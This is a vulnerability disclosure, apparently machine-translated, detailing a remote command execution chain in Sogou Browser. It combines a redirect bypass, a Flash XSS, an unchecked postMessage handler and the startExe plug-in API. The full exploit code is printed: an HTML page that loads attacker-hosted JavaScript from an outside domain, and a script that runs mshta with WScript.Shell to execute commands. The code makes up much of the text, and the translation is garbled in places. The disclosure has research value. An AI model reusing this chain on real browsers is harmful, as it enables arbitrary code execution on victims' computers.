Sogou Browser Remote Command Execution

Sogou Browser Remote Command Execution

This time, sogou made targeted changes to multiple points in the previous vulnerability, but some points still lacked consideration. This allows us to continue to bypass sogou's repair measures and implement remote command execution.

In addition, You Don't Have To deliberately lower the rank value. I won't go to SGSRC.

1. First, let's list the corrective actions sogou has taken against the previous vulnerability.

A. Restrict location. href to jump directly to se-extension, that is

Location. href = 'se-extension: // ext-1055834318/signin.html '; opens a blank page ".

Likewise:

Window. open ('se-extension: // ext-1055834318/signin.html '); also opens a blank page"



B. Fixed the XSS in se-extension: // ext-1055834318/signin.html, that is, the plug-in com. sogou. snapTaker was updated to version 0.89.

var renrenUrl = "https://graph.renren.com/oauth/authorize?",weiboUrl = "https://api.weibo.com/oauth2/authorize?";if (url && (url.indexOf(renrenUrl) === 0 || url.indexOf(weiboUrl) === 0)) {

This time I made no mistakes on the url, so this XSS was fixed this time.



C. Changed the startExe API code in npgamecenterlite. dll, that is, the com. sogou. gamecenter plug-in was upgraded to version 1.0.7. (But I forgot to change the plug-in version number of the js/seed. js code in the directory ?, Var PLUG_VERSION = global ['plug _ version'] = "1.0.6 ";)



Http://img.wan.sogou.com/cdn/gamehelperV0.3/v1.0.6/app.js? T = 1.0.6



The startExe code in is as follows:

miniLauncher.startExe(url, "/popgame " + exe_param, function(arg) {            if( arg ){                utils.pb_cl( '2013_popup' , 'id=micro_launched' );            }            log( arg ); // if true , mean function calls success        });

After analysis, we found that in this version, startExe has three parameters. The pseudo code of the function is roughly as follows:

Function startExe (url, param, callback) {run the application (url + "sogouminigamepacker.exe" + param); run the callback}

In the previous version, startExe only has two parameters: startExe ("EXE path", callback function );



So that startexecan only use the sogouminigamepacker.exe program in a certain region.



---------------------------------------------------------------------



2. Next we will bypass or find new vulnerabilities to cope with the above repair measures.



A. unable to location. href, while window. open also opens an about: blank, but the analysis found that location can be used in about: blank. href = 'se-extension: // ext-1055834318/signin.html 'jump to the se-extension page. In this way, we can use the following method:
 

// First, window. open to open the target page, a blank page will be opened. open ('se-extension: // ext-1055834318/signin.html '); // then, use w. location. href redirects the opened page setTimeout (function () {w. location. href = 'se-extension: // ext-1055834318/signin.html ';}, 500 );

As shown in:


 

Of course, executing window. open under our own domain name will be blocked. However, due to the mechanism of sogou browser, if window. open is executed under * .sogou.com, it will not be intercepted by the browser. Therefore, we need to automatically execute window. open can be combined with an xss in the sogou.com domain. Due to the laziness, I turned over the previous sogou vulnerability and there was an unrepaired XSS.
 

http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function(){if(!window.x){alert(1);window.x=1;}}

The XSS came from a vulnerability report a year ago: WooYun: sogou Browser Remote Command Execution Vulnerability



Here, we have broken through the first fix to open any page under se-extension.





B. XSS is fixed. We need to find a new XSS.



When we analyze the se-extension: // ext740107210/html/balloon.html, we find that the page will call the callback:
 

window.onmessage = function(e) {        var data = e.data;        if (data.cmd == "BalloonCloseWin") {            window.close();        } else if (data.cmd == "BalloonNoTip") {            localStorage["balloon_forbidden"] = +new Date();            window.close();        } else if (data.cmd == "BalloonStartGame") {            sogouExplorer.tabs.create({                url: data.url,                selected: true            });            window.close();        }    };

As you can see, here is an onmessage, and the Code does not judge the data origin and data content, it enters the sogouExplorer. tabs. create Function,



If you have worked on chrome plug-in development, maybe this sogouExplorer. tabs. create should be used to create an API for the browser tab page. What security issues will there be?



When the url is javascript: alert (1);, sogouExplorer. tabs. create is equivalent to executing javascript: alert (1) on the current page. Therefore, combined with this XSS, we can use the se-extension: // ext740107210/html/balloon.html executes arbitrary XSS code.

// Pseudo code. The window object is the w Variable Window object obtained in step. postMessage ({"cmd": "BalloonStartGame", "url": "javascript: alert (1 )"},"*");

C. If the startExe function is modified, can any command be executed?



Let's first guess the judgment rules of the other party,



Document. getElementById ("embed1"). startExe ("calc.exe", "", function () {console. log (arguments )});



If this is the case above, according to the previous judgment, calc.exesogouminigamepacker.exe will be executed, of course, it will not be executed,



We add a space,

Document. getElementById ("embed1"). startExe ("calc.exe", "", function () {console. log (arguments )});



In theory, calc.exe sogouminigamepacker.exe is executed, and sogouminigamepacker.exe is treated as a parameter of calc.



But in this case, the test finds that only .exe is available.



However, you do not need to execute exe.

Document. getElementById ("embed1"). startExe ("calc", "", function () {console. log (arguments )});



In combination with the exploitation code of the previous vulnerability, modify:

document.getElementById("embed1").startExe("mshta javascript：(new/**/ActiveXObject('WScript.Shell').run('calc'));window.moveTo(-1000,-1000);window.close(); //","",function(){console.log(arguments)});

D. How can I call document. getElementById ("embed1"). startExe In the last step?



The XSS page is



Se-extension: // ext740107210/html/balloon.html,



The page for document. getElementById ("embed1"). startExe is:



Se-extension: // ext740107210/html/back.html



As you can see, both pages belong to the same plug-in (ext740107210) page,



And se-extension: // ext740107210/html/back.html is the backgroud page of se-extension: // ext740107210/html/balloon.html.



In plug-in development, sogou browser provides an API for the plug-in page to quickly obtain the window object of the background page.



SogouExplorer. runtime. getBackgroundPage (), see (http://ie.sogou.com/open/doc? Id = 2_16 & title = runtime)



Therefore, we can easily change the previous code into the following methods:

sogouExplorer.runtime.getBackgroundPage().document.getElementById("embed1").startExe("mshta javascript：(new/**/ActiveXObject('WScript.Shell').run('calc'));window.moveTo(-1000,-1000);window.close(); //","",function(){console.log(arguments)});

-----------------------------------------------------------------



3. The final exploitation code is as follows:



Sogouhehe.html

<script>window.name="f=document.createElement('script');f.src='http://xsst.sinaapp.com/poc/sogou2.js?'+Math.random();document.body.appendChild(f);";location.href="http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function(){if(!window.x){eval(window.name);window.x=1;}}";</script>

sogou2.js

w=window.open('se-extension://ext740107210/html/balloon.html');setTimeout(function(){w.location.href='se-extension://ext740107210/html/balloon.html';var x=setInterval(function(){if(w){clearInterval(x);w.postMessage({"cmd":"BalloonStartGame","url":"javascript：sogouExplorer.runtime.getBackgroundPage().document.getElementById('embed1').startExe(\"mshta javascript：(new/**/ActiveXObject('WScript.Shell').run('calc'));window.moveTo(-1000,-1000);window.close(); //\",\"\",function(){console.log(arguments)});"},"*");}},100);},500);

 

Access: http://xsst.sinaapp.com/poc/sogouhehehe.html



Win7 64



The effect is as follows:


 

 

Solution:

1. Continue to repair window. open

2. Repair balloon.html XSS

2. Continue to fix the design logic of the startExe function.